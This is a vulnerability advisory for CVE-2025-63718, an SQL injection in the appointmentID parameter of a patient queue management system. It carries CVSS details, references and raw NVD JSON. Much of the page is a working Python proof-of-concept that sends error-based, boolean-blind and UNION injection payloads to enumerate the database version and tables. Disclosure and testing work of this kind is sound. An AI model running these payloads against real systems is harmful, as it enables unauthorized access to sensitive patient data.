Security Vulnerability Report
CVE-2025-63718 CVSS 6.5 MEDIUM

Published: 2025-11-07 18:15:37
Last Modified: 2025-11-17 18:38:45

Description

A SQL injection vulnerability exists in the SourceCodester PQMS (Patient Queue Management System) 1.0 in the api_patient_schedule.php endpoint. The appointmentID parameter is not properly sanitized, allowing attackers to execute arbitrary SQL commands.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester PQMS 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-63718 PoC - SourceCodester PQMS SQL Injection
# Target: api_patient_schedule.php endpoint
# Parameter: appointmentID


def exploit_sqli(url, payload):
    """Send SQL injection payload to vulnerable endpoint"""
    target_url = f"{url}/api_patient_schedule.php"
    params = {"appointmentID": payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"


def test_basic_injection(url):
    """Test basic SQL injection - error-based"""
    # Basic payload to trigger SQL error
    payload = "1'"
    print(f"[*] Testing basic injection with payload: {payload}")
    result = exploit_sqli(url, payload)
    print(f"[+] Response: {result[:200]}")


def extract_database_version(url):
    """Extract database version using UNION injection"""
    # UNION-based injection to get database version
    payload = "1' UNION SELECT NULL,@@version,NULL-- -"
    print(f"[*] Extracting database version...")
    result = exploit_sqli(url, payload)
    print(f"[+] Database info: {result}")


def extract_tables(url):
    """Extract table names from database"""
    payload = "1' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"[*] Extracting table names...")
    result = exploit_sqli(url, payload)
    print(f"[+] Tables found: {result}")


def blind_boolean_injection(url):
    """Test blind boolean-based SQL injection"""
    # Test if '1'='1' is true (always)
    true_payload = "1' AND '1'='1"
    false_payload = "1' AND '1'='2"
    print(f"[*] Testing boolean-based blind injection...")
    true_result = exploit_sqli(url, true_payload)
    false_result = exploit_sqli(url, false_payload)
    if len(true_result) != len(false_result):
        print("[+] Blind SQL injection confirmed!")
    else:
        print("[-] No difference detected")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63718.py <target_url>")
        print("Example: python cve-2025-63718.py http://localhost/pqms")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2025-63718 SQL Injection PoC")
    print("=" * 50)

    test_basic_injection(target)
    blind_boolean_injection(target)

    # Uncomment to extract actual data
    # extract_database_version(target)
    # extract_tables(target)

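References

https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63718/README8.md (Exploit, Third Party Advisory)
https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html (Product)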

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63718", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:36.780", "lastModified": "2025-11-17T18:38:45.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the SourceCodester PQMS (Patient Queue Management System) 1.0 in the api_patient_schedule.php endpoint. The appointmentID parameter is not properly sanitized, allowing attackers to execute arbitrary SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69FC38AE-BCD1-4A41-B2E0-CE3DEE703691"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63718/README8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html", "source": "[email protected]", "tags": ["Product"]}]}}